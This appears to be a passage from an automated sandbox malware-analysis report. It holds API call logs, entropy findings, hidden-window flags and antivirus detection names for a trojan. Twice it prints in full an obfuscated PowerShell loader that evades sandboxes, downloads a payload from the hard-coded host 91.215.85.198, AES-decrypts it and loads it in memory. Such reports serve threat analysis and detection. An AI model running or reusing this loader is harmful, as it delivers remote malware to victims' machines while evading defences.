$gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); 
$crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);
filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000384
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe
parameters: -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = 
$crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);
filepath: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe
1 1 0
section {u'size_of_data': u'0x0002bc00', u'virtual_address': u'0x0000e000', u'entropy': 7.1709286752938315, u'name': u'.rsrc', u'virtual_size': u'0x0002bb2e'} entropy 7.17092867529 description A section with a high entropy has been found
entropy 0.797266514806 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 91.215.85.198
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
McAfee Artemis!9F9583B07CF9
Cylance unsafe
Sangfor Trojan.Win32.Agent.Vf3m
CrowdStrike win/malicious_confidence_70% (D)
K7GW Trojan ( 0059cfdb1 )
K7AntiVirus Trojan ( 0059cfdb1 )
BitDefenderTheta Gen:NN.ZemsilF.36164.om2@aa!kzKg
VirIT Trojan.Win32.MSIL_Heur.A
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Kryptik_AGen.ARG
APEX Malicious
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
Avast FileRepMalware [Misc]
Sophos Mal/Generic-S
McAfee-GW-Edition Artemis!Trojan
Trapmine malicious.moderate.ml.score
Ikarus Win32.Outbreak
Microsoft Trojan:Win32/Wacatac.B!ml
Gridinsoft Ransom.Win32.Wacatac.sa
ZoneAlarm UDS:DangerousObject.Multi.Generic
Panda Trj/Chgt.AD
Rising Trojan.Kryptik!8.8 (CLOUD)
Fortinet MSIL/Kryptik_AGen.ARG!tr
AVG FileRepMalware [Misc]
DeepInstinct MALICIOUS